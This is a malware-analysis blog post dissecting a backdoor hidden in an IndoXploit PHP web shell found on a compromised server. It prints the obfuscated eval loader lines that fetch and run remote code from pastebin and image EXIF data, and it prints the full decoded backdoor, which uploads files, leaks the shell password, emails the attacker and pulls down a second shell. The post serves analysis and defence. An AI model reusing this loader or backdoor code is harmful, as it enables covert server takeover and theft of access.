Republished Malware Analysis Blog Posts From March 2018

Backdoors in Hacking Tools – Pt. 1: Pacman


I was recently taking a look at the code of a version of the IndoXploit web shell that I located while investigating a compromised server (full source here) when I noticed this line:

eval(gzinflate(base64_decode(file_get_contents('http://pastebin.com/raw/6PJ9Pj8F'))));

Curious, I decoded the contents of the pastebin URL that was being executed via the eval function:

eval(str_rot13(gzinflate(str_rot13(base64_decode(('Lc29DoIwFEDhaukEAxQDGn8mUiM6CG80U08IJdwKJrW9AlefXlk8w0w/rFFiPAXgxMsUV6bQwFT3ylcUKkaCC4O0nBcwp7RiXbturOnxDktXlmbMuS2ZphZHG+1o4xBzDt3BVjBL+9fgTw//T6yp47Lz/hPFsJzSbeQ5SftbTgshtcjtatEQMyHR6uYH2/hV0oQEAxMxrQeGpKa5+AI='))))));

As usual, more encoding. The code being executed here is:

eval(base64_decode(exif_read_data("https://lh3.googleusercontent.com/-svRm4i5Bs90/VsFaosQPKUI/AAAAAAAABew/03oHWkCEsN8/w140-h140-p/pacman.jpg")["COMPUTED"]["UserComment"]));

Okay, now things are starting to get interesting. This bit of code pulls base64-encoded data out of the EXIF UserComment field of an image, then executes it as PHP.

Let’s download the image and see what’s being executed:

The EXIF data being extracted from the image and executed (decoded):

eval(str_rot13(gzinflate(base64_decode('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'))));

The code being executed here results in…another encoded function! (last one, I promise…):

@ini_set('output_buffering',0);
@ini_set('display_errors', 0);
@error_reporting(0);
eval(base64_decode('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'));
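The chain above only ever wraps a string literal in base64_decode, str_rot13 and gzinflate before handing it to eval, so each layer can be decoded statically instead of by running it. The following is an added example, not code from the original post: peel_layer and unwrap are hypothetical helper names, and SAMPLE is a constructed two-layer payload of the same shape as the real one (not the actual backdoor).

```python
import base64
import re
import zlib

# Byte-level rot13: PHP str_rot13() only touches ASCII letters.
_UP, _LO = b"ABCDEFGHIJKLMNOPQRSTUVWXYZ", b"abcdefghijklmnopqrstuvwxyz"
_ROT13 = bytes.maketrans(_UP + _LO, _UP[13:] + _UP[:13] + _LO[13:] + _LO[:13])
# Static inverses of the PHP wrappers used in the chain. PHP gzinflate()
# undoes raw DEFLATE (no zlib header), hence wbits=-15.
DECODERS = {
    "base64_decode": base64.b64decode,
    "gzinflate": lambda b: zlib.decompress(b, -15),
    "str_rot13": lambda b: b.translate(_ROT13),
}

def peel_layer(code: str):
    """Decode the trailing eval(f1(f2(...('literal')))) statement of `code` without
    running it (leading @ini_set() noise is ignored). None if there is no such eval."""
    m = re.fullmatch(r".*\beval\((.*)\)\s*;?\s*", code, re.S)
    if not m:
        return None
    expr, funcs = m.group(1).strip(), []
    while (m := re.fullmatch(r"(\w+)\((.*)\)", expr, re.S)):
        funcs.append(m.group(1))                 # outermost wrapper first
        expr = m.group(2).strip()
    m = re.fullmatch(r"'([^']*)'", expr.strip("()"))   # tolerates (('...'))
    if not m:
        return None
    data = m.group(1).encode("latin-1")
    for name in reversed(funcs):                 # PHP evaluates innermost first
        data = DECODERS[name](data)               # KeyError = no static inverse known
    return data

def unwrap(code: str) -> list:
    """Peel eval layers until the result is no longer an eval wrapper."""
    stages = []
    while (data := peel_layer(code)) is not None:
        code = data.decode("latin-1")
        stages.append(code)
    return stages

def _gzdeflate(b: bytes) -> bytes:               # forward of gzinflate(), for the sample only
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    return c.compress(b) + c.flush()

# Constructed two-layer sample shaped like the chain above (not the real payload).
INNER_PHP = "@error_reporting(0); echo 'Password E :'.$auth_pass;"
LAYER1 = "eval(base64_decode('%s'));" % base64.b64encode(INNER_PHP.encode()).decode()
_BLOB = base64.b64encode(_gzdeflate(LAYER1.encode().translate(_ROT13)).translate(_ROT13)).decode()
SAMPLE = "eval(str_rot13(gzinflate(str_rot13(base64_decode(('%s'))))));" % _BLOB
```

unwrap(SAMPLE) returns each decoded stage in order, ending with the plain PHP; a KeyError from DECODERS means the sample uses a wrapper the table does not know and should be inspected by hand.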

And finally, we see the prize – a backdoor which has been included in the shell:

@ini_set('output_buffering',0);
@ini_set('display_errors', 0);
@error_reporting(0);
$up = " <html> <head><title> -= Syedich =- </title></head><body><center><h1><font face=\"Tahoma\" size=\"5\" color=\"#ff0000\">Learn To Better</font></h1><form action=\"\" method=\"post\" enctype=\"multipart/form-data\" name=\"uploader\" id=\"uploader\"><table border=\"1\"><tr><td bgcolor=\"#000000\"><font color=\"#00ff00\"><input type=\"file\" name=\"file\" size=\"50\"><td bgcolor=\"#000000\"><input name=\"_upl\" type=\"submit\" id=\"_upl\" value=\"Upload File\"></td></td></tr></table></form></center></body>";
// File upload handler; the form itself is served via ?0upload
if( $_POST['_upl'] == "Upload File" ) {
  if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
    echo '<b><center>
<font face=\"Tahoma\" size=\"5\" color=\"#ff0000\">SUKSES UPLOAD MASTAH !!</center></b>';
  }
  else {
    echo '
<font face=\"Tahoma\" size=\"5\" color=\"#ff0000\"><center><b>GAGAL UPLOAD MASTAH !</b>';
  }
}
if(isset($_GET["0upload"])){
  echo "$up";
}
/////////////////////////////
// Reveals the IndoXploit shell's configured password ($auth_pass) via ?0cek
if(isset($_GET["0cek"])){
  echo "Password E :".$auth_pass;
}
/////////////////////////////
// One-time email to the backdoor author with the shell's URL; the hidden
// .db file marks that this host/location has already been reported
if (file_exists('.db'))
  {  } else {
  $to = "syedich@yahoo.com";
  $subject = $_SERVER['SERVER_NAME'];
  $header = "From: Mastah <jancok@matamucok.com>";
  $message = "Exploit : http://". $_SERVER['SERVER_NAME']. $_SERVER['REQUEST_URI'];
  mail($to, $subject, $message, $header);
  $m = fopen(".db", "w") or die (" ");
  $txt = "";
  fwrite($m, $txt);
  fclose($m);
  chmod(".db",0644); }
/////////////////////////////
// Drops a second shell as themes.php (remote source offline at time of analysis)
if(isset($_GET["0shell"])){
  $anak1 = file_get_contents("https://sites.google.com/site/bhshll123/bh.txt");
  $nggawe1 = fopen("themes.php","w") or die ("gabisa pak");
  fwrite($nggawe1,$anak1);
  fclose($nggawe1);
  header ("Location:themes.php");
  chmod("themes.php",0644);}
//////////////////////////////
// Writes a defacement page as 0x.htm (remote source offline at time of analysis)
if(isset($_GET["0deface"])){
  $anak = file_get_contents("http://pastebin.com/raw/6JA72K8m");
  $nggawe = fopen("0x.htm","w") or die ("gabisa pak");
  fwrite($nggawe,$anak);
  fclose($nggawe);
  header ("Location:0x.htm");}

Functions of this backdoor:

  • Emailing the backdoor author the IndoXploit shell’s location
  • Emailing the backdoor author the password (if any) that has been configured in the IndoXploit shell by the person who put IndoXploit there in the first place.
  • Dropping a hidden file to let the backdoor know if it has already sent this location and password information to the author, so that it can prevent more than one email per infected host/location from being sent.
  • Ability to provide the IndoXploit shell’s current password on the shell’s login page when presented with a specific GET variable/value combination, in case the password has changed.
  • File upload function.

Missing Functions:

Two other functions appear to drop what looks like a version of “blackhat shell” (another common web shell) and to write an HTML file containing a defacement message to the server.

Unfortunately, at the time this was located, the URLs containing the code executed in those functions had been pulled offline by Google and Pastebin respectively for ToS violations, so I wasn’t able to analyze their code to confirm.

Final Thoughts:

Despite the functions missing due to ToS takedowns, the capabilities still present and functional in this backdoor are more than sufficient to provide whoever put it there with access to effectively any site/server where their backdoored IndoXploit shell is placed.

This will be the first of a series of posts regarding backdoors I’ve found hidden within these types of tools which were located on compromised servers.

Malware Research

Original Research and Blog Posts by Sky Larsen